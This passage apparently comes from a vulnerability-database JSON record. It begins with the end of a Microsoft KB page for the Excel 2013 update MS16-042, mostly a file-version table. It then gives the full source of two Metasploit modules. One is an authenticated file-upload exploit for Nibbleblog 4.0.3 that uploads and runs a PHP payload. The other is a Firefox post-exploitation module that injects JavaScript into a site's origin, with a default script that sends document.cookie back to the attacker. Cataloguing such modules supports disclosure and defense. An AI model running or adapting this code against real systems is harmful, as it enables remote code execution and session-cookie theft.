class=\"sbody-td\">xlsrv.ecs.excelcnv.exe</td><td class=\"sbody-td\">excelcnv.exe</td><td class=\"sbody-td\">15.0.4815.1000</td><td class=\"sbody-td\">29502144</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xl12cnvp.dll</td><td class=\"sbody-td\">excelcnvpxy.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">48704</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xlcall32.dll</td><td class=\"sbody-td\">xlcall32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">10856</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1025</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1026</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1033</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1037</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1054</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1057</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1061</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1062</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1063</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1066</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1081</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1086</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_1087</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver.xlam_2074</td><td class=\"sbody-td\">solver.xlam</td><td class=\"sbody-td\"></td><td class=\"sbody-td\">426707</td><td class=\"sbody-td\">16-Mar-16</td><td class=\"sbody-td\">07:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1025</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1026</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1028</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1029</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1030</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1031</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1032</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1033</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1035</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1036</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1037</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1038</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1040</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1041</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1042</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1043</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1044</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1045</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1046</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1048</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1049</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1050</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1051</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1053</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1054</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1055</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1057</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1058</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1060</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1061</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1062</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1063</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1066</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1081</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1086</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_1087</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_2052</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_2070</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_2074</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">solver32.dll_3082</td><td class=\"sbody-td\">solver32.dll</td><td class=\"sbody-td\">15.0.4454.1000</td><td class=\"sbody-td\">216136</td><td class=\"sbody-td\">15-Mar-16</td><td class=\"sbody-td\">04:41</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to get help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"> Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-11\" target=\"_self\">Support for Microsoft Update</a><br/><br/> Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-12\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/> Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-13\" target=\"_self\">Virus Solution and Security Center</a><br/><br/> Local support according to your country: <a href=\"\" id=\"kb-link-14\" target=\"_self\">International Support</a></div><br/></span></div></div></div></div></body></html>", "modified": "2017-01-23T01:45:52", "id": "KB3114947", "href": "https://support.microsoft.com/en-us/help/3114947/", "published": "2017-01-23T01:44:23", "title": "MS16-042: Description of the security update for Excel 2013: April 12, 2016", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-11-22T08:34:08", "bulletinFamily": "exploit", "description": "Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.\n", "modified": "2018-07-12T22:34:52", "published": "2015-09-10T00:05:36", "id": "MSF:EXPLOIT/MULTI/HTTP/NIBBLEBLOG_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "Nibbleblog File Upload Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Nibbleblog File Upload Vulnerability',\n 'Description' => %q{\n Nibbleblog contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. This module was\n tested on version 4.0.3.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?\n 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module\n ],\n 'References' =>\n [\n ['CVE', '2015-6967'],\n ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']\n ],\n 'DisclosureDate' => 'Sep 01 2015',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Nibbleblog 4.0.3', {}]],\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),\n OptString.new('USERNAME', [true, 'The username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with'])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def check\n cookie = do_login(username, password)\n return Exploit::CheckCode::Detected unless cookie\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'admin.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'settings',\n 'action' => 'general'\n }\n )\n\n if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 \"Coffee\"')\n return Exploit::CheckCode::Appears\n end\n Exploit::CheckCode::Safe\n end\n\n def do_login(user, pass)\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'admin.php')\n )\n\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\n\n session_cookie = res.get_cookies\n vprint_status(\"Logging in...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin.php'),\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'username' => user,\n 'password' => pass\n }\n )\n\n return session_cookie if res && res.code == 302 && res.headers['Location']\n nil\n end\n\n def exploit\n unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)\n print_error(\"Target does not appear to be vulnerable.\")\n return\n end\n\n vprint_status(\"Authenticating using #{username}:#{password}\")\n\n cookie = do_login(username, password)\n fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?\n vprint_good(\"Authenticated with Nibbleblog.\")\n\n vprint_status(\"Preparing payload...\")\n payload_name = \"#{Rex::Text.rand_text_alpha_lower(10)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part('my_image', nil, nil, 'form-data; name=\"plugin\"')\n data.add_part('My image', nil, nil, 'form-data; name=\"title\"')\n data.add_part('4', nil, nil, 'form-data; name=\"position\"')\n data.add_part('', nil, nil, 'form-data; name=\"caption\"')\n data.add_part(payload.encoded, 'application/x-php', nil, \"form-data; name=\\\"image\\\"; filename=\\\"#{payload_name}\\\"\")\n data.add_part('1', nil, nil, 'form-data; name=\"image_resize\"')\n data.add_part('230', nil, nil, 'form-data; name=\"image_width\"')\n data.add_part('200', nil, nil, 'form-data; name=\"image_height\"')\n data.add_part('auto', nil, nil, 'form-data; name=\"image_option\"')\n post_data = data.to_s\n\n vprint_status(\"Uploading payload...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin.php'),\n 'vars_get' => {\n 'controller' => 'plugins',\n 'action' => 'config',\n 'plugin' => 'my_image'\n },\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'cookie' => cookie\n )\n\n if res && /Call to a member function getChild\\(\\) on a non\\-object/ === res.body\n fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')\n elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )\n fail_with(Failure::Unknown, 'Unable to upload payload.')\n end\n\n vprint_good(\"Uploaded the payload.\")\n\n php_fname = 'image.php'\n payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)\n vprint_status(\"Parsed response.\")\n\n register_files_for_cleanup(php_fname)\n vprint_status(\"Executing the payload at #{payload_url}.\")\n send_request_cgi(\n 'uri' => payload_url,\n 'method' => 'GET'\n )\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/nibbleblog_file_upload.rb"}, {"lastseen": "2019-11-23T21:31:57", "bulletinFamily": "exploit", "description": "This module runs the provided SCRIPT as javascript in the origin of the provided URL. It works by navigating to a hidden ChromeWindow to the URL, then injecting the SCRIPT with Function(). The callback \"send(result)\" is used to send data back to the listener.\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-04T14:46:41", "id": "MSF:POST/FIREFOX/GATHER/XSS", "href": "", "type": "metasploit", "title": "Firefox XSS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'json'\nrequire 'msf/core/payload/firefox'\n\nclass MetasploitModule < Msf::Post\n include Msf::Payload::Firefox\n include Msf::Exploit::Remote::FirefoxPrivilegeEscalation\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Firefox XSS',\n 'Description' => %q{\n This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'joev' ],\n 'Platform' => [ 'firefox' ]\n ))\n\n register_options([\n OptString.new('SCRIPT', [true, \"The javascript command to run\", 'send(document.cookie)']),\n OptPath.new('SCRIPTFILE', [false, \"The javascript file to run\"]),\n OptString.new('URL', [\n true, \"URL to inject into\", 'https://metasploit.com'\n ]),\n OptInt.new('TIMEOUT', [true, \"Maximum time (seconds) to wait for a response\", 90])\n ])\n end\n\n def run\n results = js_exec(js_payload)\n if results.present?\n print_good results\n else\n print_error \"No response received\"\n end\n end\n\n def js_payload\n js = datastore['SCRIPT'].strip\n %Q|\n\n (function(send){\n #{set_timeout_source}\n\n var hiddenWindow = Components.classes[\"@mozilla.org/appshell/appShellService;1\"]\n .getService(Components.interfaces.nsIAppShellService)\n .hiddenDOMWindow;\n\n hiddenWindow.location = 'about:blank';\n var src = (#{JSON.unparse({ :src => js })}).src;\n var key = \"#{Rex::Text.rand_text_alphanumeric(8+rand(12))}\";\n\n hiddenWindow[key] = true;\n hiddenWindow.location = \"#{datastore['URL']}\";\n\n var evt = function() {\n if (hiddenWindow[key]) {\n setTimeout(evt, 200);\n } else {\n setTimeout(function(){\n try {\n send(hiddenWindow.wrappedJSObject.Function('send', src)(send));\n } catch (e) {\n send(\"Error: \"+e.message);\n }\n }, 500);\n }\n };\n\n setTimeout(evt, 200);\n })(this.send);\n\n |.strip\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/firefox/gather/xss.rb"}]}